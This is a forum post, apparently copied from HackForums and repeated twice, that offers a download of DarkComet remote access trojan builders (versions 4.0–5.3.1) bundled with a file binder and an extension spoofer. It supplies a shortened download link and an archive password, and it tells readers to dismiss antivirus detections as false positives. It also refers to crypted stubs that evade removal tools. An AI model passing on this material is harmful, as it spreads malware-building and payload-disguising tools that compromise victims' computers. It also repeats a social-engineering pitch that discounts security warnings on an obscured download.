Molo.Interlopul

DarkComet RAT 4.0 - 5.3.1 Full Versions

So I decided to share with you guys this little "collection" of the DarkComet RAT I had. Its from versions 4.0 to 5.3.1 - To be honest, for me those were the best versions of DarkComet.

Extra items added:

Celesty Binder:

Pictures of Celesty Binder:

t9i86

Extension Spoofer:

RFSVkZ4.png

IF OR WHEN YOU DO DECIDE TO MAKE A VIRUS SCAN. PLEASE NOTE THAT DARKCOMET BUILDS VIRUSES, A POWERFUL ONE. DO NOT COME TO ME OR TO THIS THREAD TO POST SUCH THINGS AS, "It's infected! don't download. I scanned it on Virustotal and it was detected as malware!". OF COURSE IT WAS, BECAUSE IT BUILDS THEM.

[*] Those are known as "false-positive" just to let you know. Unless if whatever other malicious buidling program you download(ed) really is backdoored.

[*] And for your safety, I will provide you all with a very, and I mean VERY helpful tool(s). This site is trusted, and it has tools that will probably safe your computer from skids that are learning how to use RATs, you don't need to buy these tools, they are completely free.. It also has other cool stuff like some legal keyloggers if you wanna check them out.

Download for the DarkComet RAT 4.0 - 5.3.1 Full Versions:

http://tinyurl.com/l9u8xxz +And as always, be careful with downloads out there, hopefuly you knowing what they are capable of doing from this RAT you'll be more safe. And also remember that the DarkComet remover is only for DarkComet RATs only!, not for any other RATs.. This also has no match against a crypted STUB.
password to the file: powersafe

Source: HackForums

On 3/24/2015 at 11:10 PM, Molo.Interlopul said:

So I decided to share with you guys this little "collection" of the DarkComet RAT I had. Its from versions 4.0 to 5.3.1 - To be honest, for me those were the best versions of DarkComet.

Extra items added:

Celesty Binder:

Pictures of Celesty Binder:

t9i86

Extension Spoofer:

RFSVkZ4.png

IF OR WHEN YOU DO DECIDE TO MAKE A VIRUS SCAN. PLEASE NOTE THAT DARKCOMET BUILDS VIRUSES, A POWERFUL ONE. DO NOT COME TO ME OR TO THIS THREAD TO POST SUCH THINGS AS, "It's infected! don't download. I scanned it on Virustotal and it was detected as malware!". OF COURSE IT WAS, BECAUSE IT BUILDS THEM.

[*] Those are known as "false-positive" just to let you know. Unless if whatever other malicious buidling program you download(ed) really is backdoored.

[*] And for your safety, I will provide you all with a very, and I mean VERY helpful tool(s). This site is trusted, and it has tools that will probably safe your computer from skids that are learning how to use RATs, you don't need to buy these tools, they are completely free.. It also has other cool stuff like some legal keyloggers if you wanna check them out.

Download for the DarkComet RAT 4.0 - 5.3.1 Full Versions:

http://tinyurl.com/l9u8xxz +And as always, be careful with downloads out there, hopefuly you knowing what they are capable of doing from this RAT you'll be more safe. And also remember that the DarkComet remover is only for DarkComet RATs only!, not for any other RATs.. This also has no match against a crypted STUB.
password to the file: powersafe

Source: HackForums